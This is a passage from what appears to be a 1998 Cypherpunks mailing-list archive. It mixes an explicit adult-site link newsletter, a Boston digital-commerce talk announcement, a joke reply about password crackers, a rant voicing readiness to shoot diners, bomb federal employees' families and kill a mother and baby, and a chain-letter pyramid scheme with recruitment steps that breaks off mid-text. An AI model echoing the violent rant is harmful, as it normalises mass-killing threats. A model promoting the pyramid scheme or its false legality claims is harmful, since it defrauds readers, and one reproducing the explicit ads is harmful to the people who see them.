Annie's Web .................. http://www.webeweb.net/annie/

AMY'S PAGE
Is this Babewatch or what?  yet another hot little blonde
vixen for us to see.  Tight ass, great tits and a pussy that
yells out, come screw me!  You have to see her free movies!
Amy's Page ............. http://www.amysplace.com/start.html

MY NAKED GIRLFRIEND
You more artistic types will enjoy this website. It features
dark art nude type photos.  Slave and master fans will like
her very tight and painful looking nipple clams. Ouch, ouch!
My ......... http://web0.tiac.net/users/dimitrip/nakedgf.htm

READ THIS!! WIN $25,000 and a Fantasy Date - Click Here Now!
$25,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A

HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
5 90min -> http://www.spreadteens.com/ian/hardcorevideo.html

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
Ally: This blonde football fan lost a bet on the Packers for
Super Bowl XXXII,  so  she  is  not  only  becoming a Dallas
Cowboy fan but is also  getting  buck  naked for everyone to
see. She is quite a looker and her photographs are very high
quality. So strap on your helmet and blitz her site now!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
StinkyBoy's Sex Stories: Stinky gives  you a fresh selection
of sex stories in 3  nasty categories: Gang Bangs, Lesbians,
and B & D. ............... http://www.stinkyboy.com/stories/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?150
Pic  2 --------------------------> http://137.39.63.229/?151
Pic  3 --------------------------> http://137.39.63.229/?152
Pic  4 --------------------------> http://137.39.63.229/?153
Pic  5 --------------------------> http://137.39.63.229/?154
Pic  6 --------------------------> http://137.39.63.229/?155
Pic  7 --------------------------> http://137.39.63.229/?156
Pic  8 --------------------------> http://137.39.63.229/?157
Pic  9 --------------------------> http://137.39.63.229/?158
Pic 10 --------------------------> http://137.39.63.229/?159

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 15 Feb 1998 05:27:40 -0800 (PST)
To: Recipient List Suppressed:;
Subject: DCSB: Joseph Reagle; Meta-data and Negotiation in Digital Commerce
Message-ID: <v04003a04b10c9b6a5593@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: rah@pop.sneaker.net
Mime-Version: 1.0
Date: Sat, 14 Feb 1998 11:02:37 -0500
To: dcsb@ai.mit.edu, dcsb-announce@ai.mit.edu
From: Robert Hettinga <rah@shipwright.com>
Subject: DCSB: Joseph Reagle; Meta-data and Negotiation in Digital Commerce
Cc: "Joseph M. Reagle Jr." <reagle@w3.org>, Adam Shostack <adam@homeport.org>,
        Jeremey Barrett <jeremey@bluemoney.com>
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga <rah@shipwright.com>

-----BEGIN PGP SIGNED MESSAGE-----


              The Digital Commerce Society of Boston

                            Presents

                        Joseph Reagle Jr.
                   World Wide Web Consortium

                        "Social Protocols":
                    Meta-data and Negotiation
                       in Digital Commerce

                    Tuesday, March 3, 1997
                           12 - 2 PM
               The Downtown Harvard Club of Boston
                  One Federal Street, Boston, MA




On the foundations of basic network, meta-data, and negotiation protocols, a
"new" set of protocols, "social protocols," are being built. They are in
fact applications of meta-data and negotiation in order to mimic the social
capabilities people have in the real world: capabilities to create rich
content, make verifiable assertions, create agreements, and to develop and
manage trust relationships. Furthermore, governments realize that a
significant portion of their constituencies and markets are moving on-line.
Consequently, as the sophistication of one's interactions on the Web
increase through the development of social protocols, so does the
regulators' interest in extending their "real world" mandates on commerce
and culture to the Web.  Mr. Reagle will detail the development of "social
protocols" and their ability to create and maintain spontaneous, emergent,
social structures versus their ability to propagate "real world" norms on
the Web.


Joseph Reagle Jr. joined the World Wide Web Consortium (W3C) at MIT in
October of 1996 to focus on policy issues related to the development of
global technologies and their relationship to social and legal structures.
Specifically, how to promote "good" engineering when applied to a
multifaceted and often contentious policy environment; one result of this
activity is the W3C Statement on Policy. Mr. Reagle received a Computer
Science degree from University of Maryland Baltimore County (UMBC) and
continued on to the S.M. Technology and Policy program at the Massachusettes
Institute of Technology (MIT). While at MIT he worked with the Research
Program on Communication Policy on IPR, eCommerce, security, and
cryptographic policy. During the summer of '95, he worked at Open Market on
electronic commerce protocols. Before joining the W3C at the Laboratory for
Computer Science (MIT), Mr. Reagle consulted on Internet and interactive
media for McCann-Erickson, and Internet gambling for go-Digital.



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, March 3, 1997, from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, on One Federal Street. The price for lunch is
$32.50. This price includes lunch, room rental, various A/V hardware, and
the speaker's lunch. ;-).  The Harvard Club *does* have dress code: jackets
and ties for men (and no sneakers or jeans), and "appropriate business
attire" (whatever that means), for women.  Fair warning: since we purchase
these luncheons in advance, we will be unable to refund the price of your
lunch if the Club finds you in violation of the dress code.

We will attempt to record this meeting for sale on CD/R, and to put it on
the web in RealAudio format, at some future date.


We need to receive a company check, or money order, (or, if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by Saturday,
February 28th, or you won't be on the list for lunch.  Checks payable to
anyone else but The Harvard Club of Boston will have to be sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston", in the amount of $32.50. Please include your e-mail
address, so that we can send you a confirmation

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Upcoming speakers for DCSB are:

April     Adam Shostack       Digital Commerce Security:
                               Beyond Firewalls
May       Jeremey Barrett     Digital Bearer Certificate Protocols


We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, <mailto: rah@shipwright.com>.


For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to <mailto: majordomo@ai.mit.edu> . If
you want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the
body of a message to <mailto: majordomo@ai.mit.edu> .

We look forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston



-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.3

iQEVAwUBNOW/58UCGwxmWcHhAQG+Mgf/RRBnjaC5ir0QKuD8+tgNhhvdoi2ajZRk
KgaBzsd0PDRx/3W2UJTuIR/pzMQBRKp0pstRVkTO74edyIHEWwbUcIvxCmQaCx69
NC2sDRiNDBDyGdfLHq4k7EoEE+I2KYl+bcXLJuIPHdBKpNbDZ9IPrs5z2S0gyc1I
FPZkj+EjO8oNXXA9H9nqzjhF5aHvLv5XZrxvb08iLAMl6iepBQz7qdh619CPm7tu
2A8VD9G+46kGXN4SnjOjRUXgKnoQGMTs1TBdMWuse6qmipSMLxXVQXCvAOoD8VSc
g3lI3EQB7mjX+P2nVchVYVUBfpxgYJsvtw5zqBBd3f1tpeLCeI29Sg==
=Fzwi
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>



For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 14 Feb 1998 23:50:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: crackers
In-Reply-To: <f27464ed.34e60b2a@aol.com>
Message-ID: <199802150750.IAA04662@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Feb 1998 16:22:47 EST  Ah1261@aol.com wrote:

>I WOULD LIKE SOME INFO ON PASSWORD CRACKERS EMAIL ME BACK A.S.A.P.

I like them with some cheese, but you may not.  You'll have to let us know if
you like cheese or not.  BTW those crackers you can get from Wal-Mart are
better than password crackers IMHO

Free lunch anyone? ;-)

 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jay A. Tolkoff" <103637.641@compuserve.com>
Date: Sun, 15 Feb 1998 06:28:27 -0800 (PST)
To: CypherPunks <cypherpunks@toad.com>
Subject: Space Alien CypherPunks / Uncorrupted / From Russia, With Love
Message-ID: <199802150927_MC2-3361-2C5E@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain


	____________________________________
	SPACE ALIENS HIDE MY DRUGS !!!???!!!
  	____________________________________
		by The Author
			Copyright 2000, The Lost Planet Airmen

PROLOGUE:
--------
  I was very young as a dark and stormy Knight...

[Author's Note: This part of the prologue is numbered 1-of-0 because there is,
 in reality, no telling how long, wide and far I may or may not ramble in 
 telling a tale which lies deep inside of me and cries out to be told, despite
 the rapid degeneration of what little is left of my nervous system, my brain
 function, and my sanity in general.
 As well, after a lifetime of using an overwhelming excess of commas in my
 sagacious scribblings and blitheful blatherings, I am well aware that commas
 do not grow on trees (except for cherry trees, and they are upside down--thus
 of no use to a scribe such as myself) and that this account of tales untold
 since the beginning of time (1949, in my universe) may well end in mid-sentence
 when I have used the last of the commas that I have purloined, stolen and
 hoarded, over the years, is removed from my secret hiding place and placed on
 the written page.
 Hopefully, before this has come to pass, I will have managed to reveal all of
 the myriad of universal secrets which have remained hidden in plain sight of
 us all (particularly George Carlin), since the founding of the universe, and
 the final comma that marks the end of my wisdom will mark the beginning of a
 new universal ignorance, in which all shall finally know that there *is*no*
 knowledge*, and that "The ClueServer died for our sins".]

 
The Death of gomez and the Birth of Magical Thinking:
  I am the Prophet...
  It's not something I'm proud of, and I in no way planned for things to turn
out this way, but the role of Unerring Prophet of the Future of All Mankind
was forced on me by circumstances beyond my control.
  Originally, I was just trying to be a brain-warped, cynical asshole--doing
my best to stir up shit, cause trouble, spreadFear/Uncertainty/Disinformation
to the best of my ability, and maintain a conscientiously applied plan of good
oral hygene. ("Thank you. I'm feeling much better, now.)

  I've been crazy all of my life, having suffered serious brain injury as a 
child, and compounding this natural disaster by a willful ingestion of a variety
of legal and illegal substances designed to enrich pharmacists and people with
dark skin tones who spend much of their time on dimly-lit street corners.
  There are those who read my apparently mad ramblings and assume that I am
some kind of creative writing genius heavily influenced by Hunter S. Thompson,
Carlos Castenada, Stephen King and William Burrogh's Jr. They are wrong.
  As gomez himself said, before being removed as the eternal symbol of the
true Digerati, the Circle of Eunuchs, "We don't make it up, we just make it
better."
  Thus, when I describe the series of ElectroShock treatments that I underwent
under the care of Dr. Abram Hoffer (the Father of Megavitamin Therapy), and 
describe them as taking place at the exact same moment as the massive power
blackouts throughout the NorthEastern United States and Canada, the details
I provide may not be accurate within the time-space continuum, but they will
be totally consistent with the Ultimate and Eternal Truth as evidenced by the
True Measure of Reality--the electrical bill from SaskPower Corporation that
was presented to Central Hospital in Saskatoon, Saskatchewan, which ultimately
resulted in the restructuring of the Saskatchewan MediCare system, and the loss
of many lives that could have otherwise been saved if the medical profession
had not deemed it necessary to store within my brain enough electricity to
create a thousand FrankenSteins, or power the bright lights of Las Vegas for
a hundred years, in the case of an emergency.

  Hyperbole? Guess again, shit-for-brains...
  Anyone who has read "The News of the Weird" by Chuck Shephard can vouch for
the fact that the crap that backs up in my demented brain cells, until it spills
out like a toxic efflusive onto the written page, could not carry the jock-strap
of the events which happen every day, in real life, far removed from the short-
circuting electrical malfunctions spewing forth from my damaged brain synapses.

  I am the Prophet...
  I am a certified lunatic bouncing wildly back and forth between reality and
rational thought <--> magical thinking fueled by messages from Mars which I
receive hourly via the silver fillings in my decaying dentures <--> logical
assumptions based on the patterns formed by rat-droppings I use to encrypt
my writings with the same algorithms used as the basis for C2Net's Stonghold
encryption software.

  In all honesty, I have to admit that I was lying when I presented myself to
WebWorld at large as the TruthMonger.
  But, "The best laid plans of rats and men..."

  My poor self-image, my low self-esteem, and the knowledge that I had come
by them honestly, drove me to a state where I was determined to live out my
life as a lying, thieving, conniving, rat-bastard-piece-of-shit who would crap
on and distort the truth about everything that normal, decent people hold
sacred in their lives.
  So I used my computer skills, my limitless supply of amphetamines, and my
powers of obsessive-compulsive, psychotic fixation to rail madly against 
the surrounding hordes of men and women of reason who strove to suffocate the
madness that I was destined from birth to manifest on the long and twisted
road which would ultimately lead to my emergence as the Anti-Christ who would
raze the complete face of the earth with violent spasms of death and destruction
the likes of which the universe has never seen.

  "It's life's illusions I recall...I really don't know life, at all."
~Joni Mitchell
  "All my lies are true...and everything I do, I really am."
~Carroll
  "Some say he's good...some say he's great...some just say, 'It's a *shame*
about that boy.'"
~Sonny King, introducing C.J.Parker, the King of Country Porno, at Club Foot
 in Austin, Texas, at a benefit for Xalapeno Charlie.

  In the end, I reached spiritual enlightenment through the realization that
Satan, the Evil One, the Anti-Christ, Bill Gates, Louis Freeh, Janet Reno, can
never hope to even remotely approach the depths of depravity, outrageous
licentiousness and lunacy, or sick and twisted dementia exhibited daily by
the average Jane and Joe smiling at us from the other side of the bank manager's
desk, or the check-out counter at the local K-Mart.
  No matter how depraved the sick, demented spewings from my evil mind became,
attempting to poison the minds of all who came into contact with my evil,
satanic blatherings, masquerading as a true mirror of the reality that surrounds
us--in the end, I was, am, and will continue to be...TruthMonger.

  I am the Prophet...
  If my sick, twisted mind concocts some bizarre, depraved fantasy about Lisa
Bonet Ramsey's rotting carcass rising from a roadside ditch to plug parking
meters and being flown by the Cincinnati Police Department to New York City
to carry out Judge Ito's sentence of having a toilet plunger shoved up her
ass, then one of two things will happen.
  Either CNN will break the story, exactly as I have described it, minutes
before my missive shows up on the InterNet, or I will receive the lastest
email version of "News of the Weird," which will report real news stories from
the mainstream media which make my fantasy's look like shallow attempts by
Miss Manners to increase her readership.

Death of a Legend / The Truth About the CypherPunks:
  The CypherPunks have long been renowned as standing at the bleeding edge of
the burdgeoning computer technology which is rapidly changing the face of our
planet and the governmental, civil, and social societies encompassed within
this celestial orb.
  Harbingers of the Digital Future / Pioneers of Future Technology / etc., etc.
  Bullshit...
  The CypherPunks are rag-tag band of infantile, pseudo-anarchistic, pseudo-
cryptic, well-educated shit-disturbers who take great pleasure in pissing on
themselves, each other, and the world around them--all the while, covering
their motivations and ambitions with high-sounding ideals intended to disguise
the fact that none of them ever received proper toilet-training.

  The end result?
  No matter how high they pile it, how far they spread it, or how badly it 
smells when you step in it, they end up coming off as the Henry Kissinger's
of CyberSpace, because no matter how much rotten meat, jalapenos and moldy
cheese they eat, they can never manage to crap out anything so vile and foul-
smelling that the world-at-large cannot prove prophetic in MeatSpace.

Question for Blanc Weber (CypherPunks version of the Sweetheart of the Rodeo):
  Yes, Blanc, I am the one who was hiding in the bushes near the gravesites
when you were laying the wreaths in honor of Mother Teresa and the children
who were the 'victims' of the Oklahoma Federal Building bombing. Yes, that
was me who was whistling the eerie medely of "Psycho Killer" and "Street 
Fighting Man" while you were busy trying to honor the souls of the 'innocents'
who died for the sin of being born.
  Realizing that we are polar-opposites, I am willing to concede that perhaps
Eternal Truth, True Justice and A Noble Ideal To Be Named Later might best be
served if you and I met in the middle and acted in concert to do what must
inevitably be done to balance the distorted energy of the Tao which is currently
tearing our planet, our socities and our individuals to pieces.

  I am ready now...when will you be ready?
  I am ready to walk into Luby's cafeteria today, and start blowing away people
I know and total strangers, for no real fucking reason, just to stop the voices
inside my head which scream such things as "Wake Up America"/"What the Fuck are
We all Doing to One Another"/"When will the Madness STOP!!!"
  When will you be ready?
  I am ready to kidnap men, women and children who are federal employees, or
related to them, or who sent them Christmas cards, or who failed to punch their
fucking lights out when they fucked over those they are supposed to 'serve'
because of some obscure legal technicality passed by drunken, syphlittic 
politicians in a previous century. I am ready to transport them to the site
of the OKC bombing in numbers amounting to hundreds of times of McVeigh's
victims, bombing their innocent souls into oblivion, in the hope that someone,
somewhere, will look into the eyes of the psychotic, deranged madman that I
have become, and see themself, and their neighbors, desperately trying to
maintain the illusion that their hands are free of blood when foreign children
die as a result of embargos placed within the imaginary political lines which
define our MeatSpace Reality--embargos placed by those that they themselves
voted for in return for the promise that *their* children, on the 'good' side
of the imaginary line, would be provided with good nutrition and a sound future,
unless, of course, they live in one of the poorer states, or America needs a
larger military budget to defend the most powerful military nation in the
world from some flea on the ass of an Iranian camel.
  Blanc, when will *you* be ready?
  I am ready, today, to gun down a woman carrying a baby, killing them both,
and justifying my actions by claiming I thought she was a Somalian warlord--I
am ready to drive a tank to MicroSoft Corporate Headquarters and raze it to
the ground, killing men, women and children in a violent cataclysm of smoke
and flames, justifying it with claims that MicroSoft cult members are all
gun-hoarding child-molesters who think Bill Gates is Jesus.
  When will you be ready...?

  The optomist says that the human soul is half full.
  The pessimist says that the human soul is half empty.
  The realist says, "Kill 'em all, and let God sort them out."
  Tim May says, "Broken eggs, and all that."
  
  I say, "The Revolution is NOW!"
  What do *you* say?
  Shall we set a date, sweetheart?

[TBC]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EasyMoney@MoneyMakers.com
Date: Sun, 15 Feb 1998 08:08:12 -0800 (PST)
To: Friend@public.com
Subject: Sorry this took so long...call me at home when you get this...
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Alex...here is that E-Mail I got that made me the money to get my new Entertainment system you liked so much. Tell Sarah I said hello, and call me when you get this.

  I Never Thought I'd Be the One Telling You This!!
"I Invested $20 and I'm Going to Europe on My Earnings!"

Hello, Friends!

My name is Karen Liddell; I'm a 35-year-old mom, wife, and 
part-time accountant.  As a rule, I ignore all unsolicited
"junk" e-mail and use my account primarily for business. 
I received this very same e-mail countless times and 
deleted it each time.

About two months ago I received it again and, because of 
the catchy subject line,  I finally gave it my attention. 
Afterwards, I thought, "OK, I'm going to try this.  I can
certainly afford to invest $20 and there's nothing wrong 
with creating a little excess cash." I promptly mailed four
$5 bills and, after receiving the reports, paid a friend
a small fee to send bulk e-mail for me.  After reading
the reports, I also learned how to advertise for free!

Let me tell you this:  I was not prepared for the results.
Everyday for the last six weeks, my large P.O. box has been 
literally overflowing with $5 bills; many days the excess 
fills up an extra mail bin!  I am STUNNED by all the money 
that keeps rolling in!

My husband and I had been trying to save for a down payment
on a house.  Now, not only are we purchasing a house with
40% down, we're going to Venice, Italy to celebrate!

I promise you, if you follow the steps in this e-mail and
be prepared to set aside about an hour each day to follow
up (and count your money!), you will make at least as much 
money as we did. You don't need to be a whiz at the computer
but I'll bet you already are. If you can open an envelope,
remove the money, and send an e-mail, then you're on your
way to the bank. Read this e-mail a few times so you'll 
understand how easy it is. If I can do this, so can you!

                GO FOR IT NOW!!  IT REALLY WORKS!!

                Karen Liddell

The following is a copy of the e-mail I read:

  $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
         This is a LEGAL, MONEY-MAKING PHENOMENON!!!  
    We suggest you PRINT this letter, read the directions, 
                   THEN READ THEM AGAIN!  
  $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $

You are about to embark on the most PROFITABLE and UNIQUE 
program you may ever see.  Many times over, it has proven 
its ability to generate LARGE AMOUNTS of CASH. This program
is showing fantastic appeal with a huge and ever-growing
on-line population desirous of additional income.

This is a legitimate, LEGAL, money-making opportunity.  It 
does not require you to come in contact with people, do any
selling, and you don't even have to leave the house except 
to get the mail and go to the bank!  

Simply follow the easy instructions in this letter, and 
soon your financial dreams will come true! When followed 
correctly, this electronic, multi-level marketing program 
works perfectly...100% EVERY TIME!

Thousands of people have used this program to:
    -  Raise capital to start their own business
    -  Pay off debts
    -  Buy homes, cars, etc., 

This is your chance, so don't pass it up!

     $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
             OVERVIEW OF THIS EXTRAORDINARY  
        ELECTRONIC MULTI-LEVEL MARKETING PROGRAM    
     $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $

This is what you will do to reach financial freedom:

You will send thousands of people a product for $5.00 which 
costs next to nothing to produce and e-mail. As with all 
multi-level businesses, you will increase your business by 
building your downline and selling the products.  Every 
state in the U.S. allows you to recruit new multi- level 
business online (via your computer).

The products in this program are a series of four business 
reports costing $5.00 each.  Each order you receive via 
postal mail will include:

  * $5.00 cash
  * The name and number of the report they are ordering
  * The e-mail address where you will send them the report 
    they ordered.
  * Their postal address (a great way to build a database 
    of opportunity seekers for your future endeavors). 

To fill each order, simply e-mail the product to the buyer.
              THAT'S IT!  THE $5.00 IS YOURS!
This is the EASIEST multi-level marketing business anywhere!

  $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
         FOLLOW THE INSTRUCTIONS EXACTLY AND BE 
       PREPARED TO REAP THE STAGGERING BENEFITS! 
  $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $

   * * * * * I  N  S  T  R  U  C  T  I  O  N  S * * * * *

1.  Order all 4 reports shown on the list below (you can't 
    sell them if you don't order them).
     
   *  For each of the 4 reports, send $5 CASH ONLY, the NAME and
      NUMBER OF THE REPORT YOU ARE ORDERING, YOUR E-MAIL
      ADDRESS, and YOUR POSTAL ADDRESS to the person whose
      name is listed under the corresponding report.

   *  Make sure you order each of the 4 reports.  You need
      all 4 reports to save on your computer and resell.

   *  Within 5 to 7 days you will receive, via e-mail, 
      each of the four reports. Save them on your computer
      so they will be accessible for you to send to the 
      thousands of people who will order them from you.

2.  IMPORTANT-- DO NOT alter the names of the people who are
    listed under each report, in any way other than is 
    instructed below in steps "a" through "f" or you will 
    lose out on the majority of your profit. Once you 
    understand how this program works, you'll also see how 
    it doesn't work if you change it. Remember, this method
    has been tested, and if you alter it, it will not work.

    a.  Look below for the listing of available reports.

    b.  After you've ordered the four reports, take this 
        advertisement and remove the name and address under 
        REPORT #4. This person has made it through the cycle
        and is no doubt counting their 50 grand!

    c.  Move the name and address under REPORT #3 down to
        REPORT #4.  

    d.  Move the name and address under REPORT #2 down to 
        REPORT #3.

    e.  Move the name and address under REPORT #1 down to
        REPORT #2.

    f.  Insert your name/address in the REPORT #1 position.

  =3D=3D> Please copy all names and addresses ACCURATELY!!! <=3D=3D

3.  Take this entire letter, including the modified list of
    names, and save it to your computer.  Make NO changes 
    to the instruction portion of this letter.
  
4.  Now you're ready to start an advertising campaign on 
    the WORLDWIDE WEB!  Advertising on the WEB is very 
    inexpensive, and there are HUNDREDS of FREE places
    to advertise. Another avenue which you could use for 
    advertising is investing in bulk e-mail services by
    paying someone a minimal charge to advertise for you. 

5.  For every $5.00 you receive, all you must do is e-mail
    them the report they ordered.  THAT'S IT!  ALWAYS 
    PROVIDE SAME-DAY SERVICE ON ALL ORDERS!  This will 
    guarantee that the e-mail THEY send out, with YOUR name
    and address on it, will be prompt because they can't
    advertise until they receive the report!

 ***************************************************************
                  AVAILABLE REPORTS    
             Order Each REPORT by NUMBER and NAME 
 ***************************************************************
Notes:
-  ALWAYS SEND $5 CASH (NO CHECKS) FOR EACH REPORT
-  Make sure the cash is concealed by wrapping it in at 
   least two sheets of paper  
-  On one of those sheets of paper, include: (a) the number
   & name of the report you are ordering, (b) your e-mail 
   address, and (c) your postal address.  It is suggested 
   that you rent a mailbox addressed to an assumed "company"
   name to avoid your name and home address being sent to
   millions of people. For an example, see the "company" 
   names listed below.
___________________________________________________________
REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" 

ORDER REPORT #1 FROM: 
 
      CIC
      120 Cedar Grove Ln
      Suite 314 
      Somerset NJ 08873
      
       
___________________________________________________________
REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

ORDER REPORT #2 FROM:

       PAO
      149-06 24th Ave.
      Whitestone, NY 11357
  
___________________________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:

        SSAI
       P.O. Box 1834
       Bonita, Ca.  91908-1834
   
___________________________________________________________
REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:
          
         NDZ, Inc.
        1579F Monroe Drive
        Box 240
        Atlanta, Ga.  30324

           
___________________________________________________________
  
$ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $=
 $ $
 HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU $MONEY$ 
$ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $=
 $ $

Let's say you start small just to see how it works. Assume 
your goal is to get 10 people on your first level. (Placing
a lot of FREE ads on the internet will EASILY get a larger
response.) Also assume that everyone in YOUR ORGANIZATION 
gets ONLY 10 downline members.  Follow this example to 
achieve the STAGGERING results below.

Level 1: your 10 members with $5. . . . . . . . . . . . .$50
Level 2: 10 members from those 10 ($5 x 100). . . . . . $500
Level 3: 10 members from those 100 ($5 x 1,000). . . .$5,000
Level 4: 10 members from those 1,000 ($5 x 10,000). .$50,000
                      THIS TOTALS    ----------->    $55,550

Remember: this assumes that the people who participate only
recruit 10 people each.  Think what will happen when they 
get 20 people to participate! Most people get 100's of 
participants!  THINK ABOUT IT!!!

       $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
       $   TIPS FOR YOUR SUCCESS   $
       $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $

* TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, 
  and follow the directions accurately.

* Send for the four reports IMMEDIATELY so you will have 
  them when the orders start coming in because:

     When you receive a $5 order, you MUST send the report
     to comply with U.S. Postal & Lottery Laws, Title 18,
     Sections 1302 and 1341 or Title 18,  Section 3005 in
     the U.S. Code, also Code of Federal Regs. vol. 16, 
     Sections 255 and 436, which state that "a product or 
     service must be exchanged for money received."

* Be patient and persistent! Follow the steps exactly and
  you WILL undoubtedly be SUCCESSFUL!

* HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!

       $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
       $   YOUR SUCCESS GUIDELINE    $
       $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $

=3D=3D> Follow these guidelines to GUARANTEE YOUR SUCCESS <=3D=3D

If you don't receive 20 orders for REPORT #1 within 2 weeks,
keep advertising until you do.  Then, 2 weeks later, if you
receive less than 100 orders for REPORT #2, keep advertising
until you do. Once you have received 100 or more orders for
REPORT #2, YOU CAN RELAX, because the system is already 
working for you, and the $$CASH$$ will continue to roll in!

   =3D=3D> HOW YOU WILL KNOW THE PROGRAM IS WORKING <=3D=3D

Every time your name is moved down on the list, you are 
placed under a DIFFERENT report.  You can KEEP TRACK of 
your progress by watching which report people are ordering 
from you.  If you want to generate more income, send 
another batch of your advertisement (with you in the #1 
position) and start the process again!  There is no limit 
